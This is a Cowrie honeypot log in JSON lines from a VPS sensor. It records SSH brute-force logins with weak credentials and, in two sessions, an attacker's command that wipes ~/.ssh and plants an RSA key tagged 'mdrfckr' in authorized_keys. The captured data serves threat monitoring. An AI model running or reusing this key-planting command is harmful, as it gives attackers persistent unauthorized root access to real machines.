{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:04:30.986915Z","src_ip":"196.251.115.108","session":"5fcc4b6f8a73"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:04:30.987580Z","src_ip":"196.251.115.108","session":"5fcc4b6f8a73"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwerty","message":"login attempt [oracle/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T23:04:33.860248Z","src_ip":"196.251.115.108","session":"5fcc4b6f8a73"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:35.313585Z","src_ip":"196.251.115.108","session":"5fcc4b6f8a73"}
{"eventid":"cowrie.session.connect","src_ip":"160.187.147.124","src_port":58874,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a2eaae5958b","protocol":"ssh","message":"New connection: 160.187.147.124:58874 (1.2.3.4:22) [session: 6a2eaae5958b]","sensor":"my-vps","timestamp":"2025-08-24T23:04:51.435988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:04:51.436770Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.session.connect","src_ip":"105.72.172.250","src_port":48816,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bbef0aa4aa7","protocol":"ssh","message":"New connection: 105.72.172.250:48816 (1.2.3.4:22) [session: 4bbef0aa4aa7]","sensor":"my-vps","timestamp":"2025-08-24T23:04:51.480096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:04:51.481207Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:04:51.548558Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:04:51.685388Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123456!@#$%^","message":"login attempt [root/qwerty123456!@#$%^] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:04:51.857094Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:04:52.046006Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.047393Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.048873Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.116897Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:04:52.268259Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.269026Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.337803Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.339125Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.session.connect","src_ip":"105.72.172.250","src_port":48824,"dst_ip":"1.2.3.4","dst_port":22,"session":"936f72a94613","protocol":"ssh","message":"New connection: 105.72.172.250:48824 (1.2.3.4:22) [session: 936f72a94613]","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.400185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.401040Z","src_ip":"105.72.172.250","session":"936f72a94613"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.464845Z","src_ip":"105.72.172.250","session":"936f72a94613"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin1236","message":"login attempt [root/Admin1236] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.721071Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:04:52.759362Z","src_ip":"105.72.172.250","session":"936f72a94613"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:04:53.263705Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:04:53.264363Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:04:53.265152Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:53.520060Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:53.824468Z","src_ip":"105.72.172.250","session":"936f72a94613"}
{"eventid":"cowrie.session.connect","src_ip":"105.72.172.250","src_port":48828,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bce6ced37ac","protocol":"ssh","message":"New connection: 105.72.172.250:48828 (1.2.3.4:22) [session: 9bce6ced37ac]","sensor":"my-vps","timestamp":"2025-08-24T23:04:53.883279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:04:53.884239Z","src_ip":"105.72.172.250","session":"9bce6ced37ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:04:53.943903Z","src_ip":"105.72.172.250","session":"9bce6ced37ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:04:54.032847Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:04:54.033630Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:04:54.222073Z","src_ip":"105.72.172.250","session":"9bce6ced37ac"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:54.282605Z","src_ip":"105.72.172.250","session":"9bce6ced37ac"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:54.284009Z","src_ip":"105.72.172.250","session":"4bbef0aa4aa7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:04:54.285223Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:54.286960Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.session.connect","src_ip":"160.187.147.124","src_port":59634,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae1509b4ce5c","protocol":"ssh","message":"New connection: 160.187.147.124:59634 (1.2.3.4:22) [session: ae1509b4ce5c]","sensor":"my-vps","timestamp":"2025-08-24T23:04:54.525876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:04:54.528440Z","src_ip":"160.187.147.124","session":"ae1509b4ce5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:04:54.772566Z","src_ip":"160.187.147.124","session":"ae1509b4ce5c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:04:55.756965Z","src_ip":"160.187.147.124","session":"ae1509b4ce5c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:57.008168Z","src_ip":"160.187.147.124","session":"ae1509b4ce5c"}
{"eventid":"cowrie.session.connect","src_ip":"160.187.147.124","src_port":60204,"dst_ip":"1.2.3.4","dst_port":22,"session":"b79d3d2a1ff2","protocol":"ssh","message":"New connection: 160.187.147.124:60204 (1.2.3.4:22) [session: b79d3d2a1ff2]","sensor":"my-vps","timestamp":"2025-08-24T23:04:57.250233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:04:57.252646Z","src_ip":"160.187.147.124","session":"b79d3d2a1ff2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:04:58.059290Z","src_ip":"160.187.147.124","session":"b79d3d2a1ff2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:04:59.032309Z","src_ip":"160.187.147.124","session":"b79d3d2a1ff2"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:59.309718Z","src_ip":"160.187.147.124","session":"6a2eaae5958b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:04:59.326787Z","src_ip":"160.187.147.124","session":"b79d3d2a1ff2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":37484,"dst_ip":"1.2.3.4","dst_port":22,"session":"816e44382390","protocol":"ssh","message":"New connection: 196.251.115.108:37484 (1.2.3.4:22) [session: 816e44382390]","sensor":"my-vps","timestamp":"2025-08-24T23:05:16.710028Z"}
{"eventid":"cowrie.session.connect","src_ip":"183.107.20.84","src_port":44573,"dst_ip":"1.2.3.4","dst_port":23,"session":"2e47b4c9b90f","protocol":"telnet","message":"New connection: 183.107.20.84:44573 (1.2.3.4:23) [session: 2e47b4c9b90f]","sensor":"my-vps","timestamp":"2025-08-24T23:05:16.980737Z"}
